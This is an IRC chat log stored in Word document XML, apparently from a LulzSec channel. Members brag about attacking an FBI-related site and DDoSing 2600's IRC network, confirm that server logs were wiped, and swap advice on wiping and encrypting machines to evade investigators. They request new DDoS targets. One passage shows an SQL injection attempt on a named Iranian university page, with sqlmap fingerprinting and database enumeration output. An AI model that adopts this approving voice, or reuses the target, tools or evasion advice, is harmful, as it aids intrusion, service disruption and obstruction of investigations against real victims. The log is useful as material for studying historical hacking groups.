          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:31:23 sabu recursion and devurandom quit respectfully Jun 03 23:31:27 sabu saying they are not up for the heat Jun 03 23:31:32 sabu you realize we smacked the fbi today Jun 03 23:31:36 sabu this means everyone in here Jun 03 23:31:42 sabu must remain extremely secure Jun 03 23:31:49 storm Sabu Jun 03 23:31:55 storm did you wipe the pbs bd logs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:31:58 sabu yes Jun 03 23:31:59 storm k Jun 03 23:32:01 sabu all pbs logs are clean Jun 03 23:32:04 storm then i'm game for some more Jun 03 23:32:06 sabu ;) Jun 03 23:32:08 sabu we're good Jun 03 23:32:14 sabu we got a good team here Jun 03 23:33:53 storm hehe Jun 03 23:33:53 storm orly Jun 03 23:34:06 sabu ;] Jun 03 23:34:12 storm so Jun 03 23:34:16 storm what did we do to the fbi Jun 03 23:34:24 sabu you dont know?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:34:25 sabu ROFL Jun 03 23:34:28 storm nope Jun 03 23:34:30 sabu twitter.com/lulzsec Jun 03 23:34:33 storm i was gone all day Jun 03 23:34:34 sabu ravaged them tonight Jun 03 23:34:37 storm lmao Jun 03 23:39:02 neuron O/ Jun 03 23:39:14 neuron tflow: Yo Jun 03 23:40:06 storm After doing so, we contacted Karim and told him what we did. After a few discussions, he offered to Jun 03 23:40:06 storm pay us to eliminate his competitors through illegal hacking means in return for our silence. Karim, Jun 03 23:40:06 storm a member of an FBI-related website, was willing to give us money and inside info in order to destroy Jun 03 23:40:07 storm his opponents in the whitehat world. We even discussed plans for him to give us insider botnet information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:40:09 storm ROFLMFAO Jun 03 23:40:10 storm ROFLMFAO Jun 03 23:40:11 storm wow Jun 03 23:40:16 storm epic reading Jun 03 23:40:32 neuron Yo anyone have any extra tips for staying safe? Jun 03 23:43:08 sabu clean your box out, make sure any sensitive info you have encrypted on a usb stick Jun 03 23:43:12 sabu stay behind your vpn Jun 03 23:43:16 sabu from now on your vpn is your weapon Jun 03 23:43:23 sabu without your weapon you are nothing Jun 03 23:43:30 sabu without you it is notihng blah blah blah Jun 03 23:43:34 neuron haha Jun 03 23:43:39 sabu and dont do nothing we dont approve of :D Jun 03 23:44:04 neuron Alright right now.. My "hackbox" has 512 aes encryption on the entire harddrive Jun 03 23:44:18 neuron two passwords and truecrypt on info concerning anything hacking related Jun 03 23:44:24 neuron and my vpn is HideMyAss Jun 03 23:44:43 storm sabu Jun 03 23:44:55 storm my netbook will be here win only a matter of days Jun 03 23:45:01 storm and ill be wiping my entire system Jun 03 23:45:05 storm desktop Jun 03 23:45:14 storm and just encrypting the entire drive Jun 03 23:45:16 neuron im already wiping my enitre desktop Jun 03 23:45:16 storm after i scrub it Jun 03 23:45:58 sabu yeah Jun 03 23:46:01 sabu wipe it all Jun 03 23:46:04 sabu im wiping all my shit now Jun 03 23:46:04 sabu BUT Jun 03 23:47:09 neuron ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:47:57 sabu storm: http://www.youtube.com/watch?v=SUlkAPxrwcw Jun 03 23:48:04 sabu LOLOL thats my fav vid ever Jun 03 23:48:46 neuron What do they call shells that have no logging Jun 03 23:48:48 neuron i know theres a term Jun 03 23:50:22 neuron "chaosbox" Jun 03 23:54:06 storm @LulzSec Ceasefire and we'll get you some sweatshirts. Plus a decent lawyer and movie agent if it comes to that. Your channels are restored.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:54:11 storm from 2600 Jun 03 23:54:25 storm and lmao at that guy dancing Jun 03 23:55:00 sabu dude Jun 03 23:55:28 neuron ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:56:26 sabu that vid cracks me up Jun 03 23:57:10 storm Sabu Jun 03 23:57:25 sabu sups Jun 03 23:57:25 storm I'm amazed that 2600 took their beating like champs Jun 03 23:57:29 storm and sucked our cocks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:57:30 sabu yeh Jun 03 23:57:32 sabu they did Jun 03 23:57:37 sabu gotta understand though Jun 03 23:57:38 storm respect to that Jun 03 23:57:39 storm seriously Jun 03 23:57:42 sabu they're old timers Jun 03 23:57:44 neuron haha Jun 03 23:57:47 sabu so they stil think like that Jun 03 23:57:55 storm heh Jun 03 23:57:58 storm well Jun 03 23:58:06 storm i feel abd for fucking their servers kinda Jun 03 23:58:06 storm ;x Jun 03 23:58:10 storm bad even Jun 03 23:58:13 storm but they deserved it Jun 03 23:58:15 neuron lol Jun 03 23:58:24 storm that was lame that they took registration rights from our channel Jun 03 23:58:44 neuron Anyone know if bt5 has a backdoor like bt4 black hat edition did?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:58:57 storm we Jun 03 23:58:58 storm er Jun 03 23:59:05 storm we're going to have a backtrack lulzsec version Jun 03 23:59:10 storm so it doesnt matter Jun 03 23:59:13 storm but it doesnt Jun 03 23:59:17 storm that i know of Jun 03 23:59:48 neuron Hmm im debating of just setting my hackbox up has arch again Jun 03 23:59:53 neuron Right now its bt5 Jun 04 00:00:03 neuron but im weary it has a bd Jun 04 00:00:34 storm use ubuntu :D Jun 04 00:00:49 storm arch is cool if you like kde Jun 04 00:00:56 neuron lol Jun 04 00:01:00 neuron i use awesomewm :P Jun 04 00:01:06 storm or gentoo for customisable shit Jun 04 00:03:22 neuron storm: im gonna setup arch again Jun 04 00:03:26 storm :D Jun 04 00:03:28 neuron you guys won't see me for a few hours lol Jun 04 00:03:30 storm KDE is pretty Jun 04 00:03:36 neuron i use awesome-wm Jun 04 00:03:36 storm alright Jun 04 00:03:38 storm later bra Jun 04 00:03:50 neuron http://awesome.naquadah.org/ Jun 04 00:04:48 * storm has quit (Quit: BitchX-1.1-final - just do it.) Jun 04 00:04:58 neuron Sabu: be back in a bit bro Jun 04 00:05:26 sabu kk Jun 04 00:06:34 * foolish (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pure- elite Jun 04 00:06:37 &lt;foolish&gt; there we go Jun 04 00:06:40 * foolish is now known as storm Jun 04 00:06:48 storm had to load up irssi Jun 04 00:07:21 neuron lol Jun 04 00:07:22 neuron wb Jun 04 00:07:25 storm tyty Jun 04 00:07:58 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 00:08:21 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 00:08:33 neuron wb tflow Jun 04 00:29:07 neuron alright guys im out for a bit for a arch install o/ Jun 04 00:29:12 * Neuron has quit (Quit: leaving) Jun 04 00:32:41 sabu goodnight Jun 04 00:46:47 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 00:52:31 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure- elite Jun 04 00:52:40 * anonny is now known as kl0ps Jun 04 00:52:45 kl0ps hello o/ Jun 04 00:57:53 kl0ps Sabu, lol, good morning :) ... i need a target :/ Jun 04 01:00:32 lol kl0ps hello \:D/ Jun 04 01:00:45 kl0ps \o/ Jun 04 01:00:54 kl0ps kayla :-* :D Jun 04 01:02:01 lol how are you :)?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:02:07 kl0ps lulzsec got in germany very famous too ;) Jun 04 01:02:16 lol ;) Jun 04 01:03:04 kl0ps goot, a little bit tired, but ok. i have to programming the hole day 4 study -.- Jun 04 01:03:16 kl0ps i did not sleep this night Jun 04 01:03:22 lol why not :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:03:38 kl0ps party ;) Jun 04 01:03:53 kl0ps how are u sweety?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:04:29 kl0ps brb, buying beer. (yes the crazy germans) :D Jun 04 01:07:45 kl0ps re Jun 04 01:09:50 kl0ps lol, i have ti tried to sqli a iran uni, but i am mistake. have u more luck then me?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://intstudy.ut.ac.ir/publication.php?sid=18 Jun 04 01:09:55 kl0ps -i +o Jun 04 01:10:28 kl0ps there is a vuln, but i am not able -.- Jun 04 01:14:33 kl0ps what about i am talking? -.- Jun 04 01:14:34 kl0ps [06:14:07] [INFO] target url appears to be UNION injectable with 6 columns Jun 04 01:14:40 kl0ps sry Jun 04 01:15:12 kl0ps web server operating system: Windows 2003 Jun 04 01:15:12 kl0ps web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0 Jun 04 01:15:12 kl0ps back-end DBMS: MySQL 5.0.11 Jun 04 01:16:56 lol Count(table_name) of information_schema.tables Where table_schema=0x696E747374756479 is 12 Jun 04 01:16:56 lol Tables found: cnt,country,encountry,enmain,enmain2,ennews,enpublication,gallery,main,main2,news,publication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01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x636E74 is 2 Jun 04 01:16:56 lol Columns found: id,count Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x636F756E747279 is 7 Jun 04 01:16:56 lol Columns found: id,date,titr,body,lid,img,pdf Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E636F756E747279 is 7 Jun 04 01:16:56 lol Columns found: id,date,titr,body,lid,img,pdf Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6D61696E is 6 Jun 04 01:16:56 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:16:56 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6D61696E32 is 6 Jun 04 01:16:57 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:16:58 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E6E657773 is 7 Jun 04 01:16:59 lol Columns found: id,date,type,titr,body,lid,img Jun 04 01:17:00 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x656E7075626C69636174696F6E is 7 Jun 04 01:17:01 lol Columns found: id,date,type,titr,body,img,pdf Jun 04 01:17:02 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x67616C6C657279 is 3 Jun 04 01:17:03 lol Columns found: id,date,titr Jun 04 01:17:04 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6D61696E is 6 Jun 04 01:17:05 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:17:07 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6D61696E32 is 6 Jun 04 01:17:07 lol Columns found: id,date,titr,body,img,pdf Jun 04 01:17:08 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x6E657773 is 7 Jun 04 01:17:09 lol Columns found: id,date,type,titr,body,lid,img Jun 04 01:17:10 lol Count(column_name) of information_schema.columns Where table_schema=0x696E747374756479 AND table_name=0x7075626C69636174696F6E is 7 Jun 04 01:17:12 lol Columns found: id,date,type,titr,body,img,pdf Jun 04 01:17:13 lol doesn't look like there's any passwords in it Jun 04 01:17:27 kl0ps [06:17:18] [INFO] retrieved: "&lt;p class="MsoNormal" style="text-align: justify; line-height: 140%; margin: 0cm 0cm 10pt; unicode-bidi: embed; direction: rtl; mso-margin-top-alt: auto; mso-margin- bottom-alt...[06:17:19] [INFO] retrieved: "&lt;p class="MsoNormal" style="text- align: justify; line-height: 140%; margin: 0cm 0cm 10pt; unicode-bidi: embed; direction: rtl; mso-margin-top-alt: auto; mso-margin-bottom- alt...[06:17:20] [INFO] retrieved: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01:17:27 kl0ps ©² · ² ² · ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 01:17:38 kl0ps ;) Jun 04 01:17:48 kl0ps i think so -.- Jun 04 01:18:29 kl0ps i am dumping the db and we see Jun 04 01:20:59 kl0ps no hit -.- Jun 04 01:27:49 * lol has quit (A TLS packet with unexpected length was received.) Jun 04 01:28:03 * lol (lol@HA-372.t00.0st1iv.IP) has joined #pure-elite Jun 04 01:28:07 kl0ps http://skype-open-source.blogspot.com/ Jun 04 01:28:45 kl0ps without the fucking anti debuggers Jun 04 01:28:47 lol be back later im gonnag etsome rest &lt;3 :) Jun 04 01:28:59 kl0ps hf Jun 04 01:29:13 lol :) Jun 04 01:29:58 * lol is now known as lol|zzZZZZzz Jun 04 01:30:15 * lol|zzZZZZzz is now known as lol|away Jun 04 02:47:24 * kl0ps has quit (Ping timeout: 121 seconds) Jun 04 03:10:24 storm yooo Jun 04 03:10:57 * virtual (virtual@HA-bq2.skb.2n3ihv.IP) has joined #pure- elite Jun 04 03:11:45 * virtual is now known as trollpoll Jun 04 03:11:48 trollpoll morning all Jun 04 03:11:50 storm sup troll Jun 04 03:12:25 trollpoll looking at lulzsec night fishes Jun 04 03:12:32 storm lol Jun 04 03:12:51 trollpoll and loling of course :P Jun 04 03:12:54 storm sabu Jun 04 03:13:07 storm where's my updated target list?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:13:14 storm :&gt; Jun 04 03:13:19 trollpoll btw, dont you think that karim affair is more for Anonymous than for lulzsec?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:13:23 storm i need stuff to fire my cannons at Jun 04 03:13:36 storm trollpoll: no Jun 04 03:13:39 storm not personallu Jun 04 03:13:44 storm personally even Jun 04 03:14:09 trollpoll because it happen after lulz hacking?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:15:50 storm I'm finally able to listen to our recording Jun 04 03:16:13 trollpoll well, anyway, everybody seems to assume that lulzsec = anonymous...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:16:43 storm well from wat ive seen Jun 04 03:16:48 storm i have seen the opposite Jun 04 03:16:58 trollpoll hmmm Jun 04 03:16:58 storm where people want anonymous to own us Jun 04 03:17:08 trollpoll lol Jun 04 03:18:22 trollpoll the first phrase Jun 04 03:18:23 trollpoll "It has come to our unfortunate attention that NATO" Jun 04 03:18:33 trollpoll NATO was talking about Anonymous Jun 04 03:18:36 trollpoll not about lulzsec...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:19:22 storm I thought it was _anyone_ partaking in anti hacktivism personally.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:20:17 trollpoll yes, but they focused on Anonymous Jun 04 03:20:44 trollpoll but, its ok... i just read yesterday something like "lulzsec a part of anonymous group"..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:21:12 storm they'll learn Jun 04 03:21:13 storm :p Jun 04 03:21:14 trollpoll or something like this in a web with some legal stuff about what we do Jun 04 03:22:58 trollpoll &lt;whirlpool&gt; maybe an ATM fetishist _ Jun 04 03:23:01 trollpoll epic lol Jun 04 03:23:20 storm loll Jun 04 03:26:56 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 03:27:13 tflow site still up \o/ Jun 04 03:27:18 storm yeah i noticed Jun 04 03:27:19 storm :D Jun 04 03:29:59 * trollpoll has quit (A TLS packet with unexpected length was received.) Jun 04 03:30:20 * trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #pure-elite Jun 04 03:31:39 trollpoll hey, is anonops.blogspot.com our?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 03:59:53 storm where's Topiary Jun 04 03:59:59 storm tweeting away no doubt Jun 04 04:00:42 Topiary ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 04:00:45 Topiary just woke up Jun 04 04:01:48 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 04:02:45 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 04:09:49 storm lol Jun 04 04:09:51 storm sup?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 04:17:31 storm Topiary: Jun 04 04:17:34 * lol|away is now known as lol Jun 04 04:17:41 storm I need an updated target list to ddos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 04:18:02 storm 2600.net is old news Jun 04 04:18:13 storm hey Kayla Jun 04 04:18:14 storm &lt;3 :D Jun 04 04:26:24 Topiary hmm not sure man Jun 04 04:35:51 * trollpoll has quit (Quit: Leaving) Jun 04 06:08:47 * neuron (neuron@HA-f21.345.a84vd3.IP) has joined #pure- elite Jun 04 06:08:54 neuron lol took a bit longer then i thought Jun 04 06:09:46 * lol has quit (A TLS packet with unexpected length was received.) Jun 04 06:09:57 * lol (lol@HA-r5m.i6c.9ln5eg.IP) has joined #pure-elite Jun 04 06:10:15 neuron hey lol o.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:15:37 lol hey :D Jun 04 06:16:03 neuron what are you doing up this late :P Jun 04 06:16:19 lol :D Jun 04 06:16:22 lol nm :ppPPp Jun 04 06:16:41 neuron lol hax0ring stuff?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:22:56 neuron its 3am sleep tiem o./ Jun 04 06:23:02 * neuron has quit (Quit: leaving) Jun 04 06:39:02 storm O_o Jun 04 06:40:02 lol hi storm :D &lt;3 Jun 04 06:40:20 storm hiya Jun 04 06:40:49 lol hows you? :D Jun 04 06:41:15 storm I'm OK.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:41:18 storm how're you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:42:48 lol im fine thanks :D just a bit angry lol xD Jun 04 06:43:09 lol lololol i went to go get some cerials from down stairs and i opend my door Jun 04 06:43:23 lol and trapped my toe under the door when i opend it xD Jun 04 06:43:24 lol lmao Jun 04 06:43:28 lol it hurts :( Jun 04 06:43:33 storm ROFL Jun 04 06:43:35 storm wow.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:43:38 storm sounds painful.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:43:53 lol like the gap under the door xD Jun 04 06:43:59 lol :( Jun 04 06:44:20 lol now im just laid on my bed with my netbook feeling sorry for my self xD Jun 04 06:44:32 lol in pain!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:44:32 lol xD Jun 04 06:44:41 storm haha Jun 04 06:44:47 storm what kinda netbook does u haz?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:44:51 storm I'm getting one Jun 04 06:49:31 lol just a silly asus thing :D Jun 04 06:49:41 lol lol Jun 04 06:49:42 lol There are 0 users and 32 invisible on 1 servers Jun 04 06:49:42 lol 1 IRC Operators online Jun 04 06:49:42 lol 20 channels formed Jun 04 06:49:42 lol I have 32 clients and 0 servers Jun 04 06:49:42 lol - Jun 04 06:49:42 lol Current local users: 32 Max: 32 Jun 04 06:49:42 lol Current global users: 32 Max: 32 Jun 04 06:49:42 lol - Jun 04 06:49:42 lol Highest connection count: 32 (32 clients) (133 connections received) Jun 04 06:49:42 lol - Jun 04 06:49:43 lol collective.2600.net ------------------------------ | Users: 32 (100.0%) Jun 04 06:49:44 lol End of /MAP Jun 04 06:49:53 lol lol 2600 is dead xD Jun 04 06:51:39 * joepie91 has quit (Ping timeout: 121 seconds) Jun 04 06:51:42 storm lol Jun 04 06:51:45 * joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 04 06:51:46 storm i feel bad Jun 04 06:51:47 storm :&lt; Jun 04 06:52:27 storm asus' are good netbooks Jun 04 06:52:38 storm i almost got one Jun 04 06:53:53 lol they good, but i should have really got one with a HDD rather than an SSD because SSD's only have a certain ammount of writes Jun 04 06:54:04 lol so shredding everything with guttman can't be good for it :S Jun 04 06:54:20 storm lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:54:30 storm I'll be shredding my wntire system when my laptop comes Jun 04 06:54:36 storm entire even.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 06:54:40 lol DBAN :D Jun 04 06:54:51 lol use DBAN :DDD Jun 04 06:54:58 lol good old boot and nuke Jun 04 06:54:58 * storm duly noted Jun 04 06:55:22 storm i dont have much i wish to save Jun 04 06:55:35 storm maybe some porn, music, and some sensetive files Jun 04 06:55:39 storm :D Jun 04 06:56:09 lol lol xD Jun 04 07:00:29 storm im brushing my teeth &gt;;x Jun 04 07:00:44 lol :D Jun 04 07:07:10 joepie91 morning all Jun 04 07:07:14 joepie91 also, om nom nom ddos Jun 04 07:07:29 storm lol Jun 04 07:07:29 storm hi Jun 04 07:13:30 storm 11:12 -!- madjack.2600.net --------------------------- ------ | Users: 126 (22.2%) Jun 04 07:13:33 storm 11:12 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 (0.0%) Jun 04 07:13:36 storm 11:12 -!- |- bartholomew.2600.net -------------------- - | Users: 105 (18.5%) Jun 04 07:13:40 storm 11:12 -!- |- djslocker.2600.net ---------------------- - | Users: 327 (57.7%) Jun 04 07:13:43 storm 11:12 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 04 07:13:45 storm collective was unlinked Jun 04 07:13:50 lol lol Jun 04 07:13:52 lol xD Jun 04 07:13:58 * t[2] (t@HA-5u1.rkn.75e5ku.IP) has joined #pure-elite Jun 04 07:14:03 storm ;p Jun 04 07:15:46 &lt;t[2]&gt; Account Balance is: 24.52 BTC (414.39 USD @ 16.90) Jun 04 07:15:48 &lt;t[2]&gt; our donations Jun 04 07:15:49 storm kayla were you bottle_of_rum?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 07:15:54 storm jesus christ Jun 04 07:15:57 storm nice job Jun 04 07:16:24 &lt;t[2]&gt; bottle of rum = tflow Jun 04 07:17:12 * Topiary has quit (Ping timeout: 121 seconds) Jun 04 07:17:43 tflow kayla was parr0t Jun 04 07:18:32 lol why lol :D?</w:t>
